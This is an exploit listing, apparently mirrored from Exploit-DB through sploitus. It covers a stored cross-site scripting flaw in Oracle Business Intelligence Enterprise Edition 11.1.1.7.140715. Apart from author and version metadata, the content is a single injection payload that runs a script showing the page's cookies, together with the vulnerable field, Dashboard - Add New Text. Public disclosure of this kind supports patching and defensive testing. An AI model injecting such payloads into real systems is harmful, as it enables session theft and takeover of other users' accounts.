Exploit for Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS

Name: Exploit for Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
Rating: 5 (88 reviews)

2021-01-20 | CVSS 7.4

## https://sploitus.com/exploit?id=EDB-ID:49444
# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text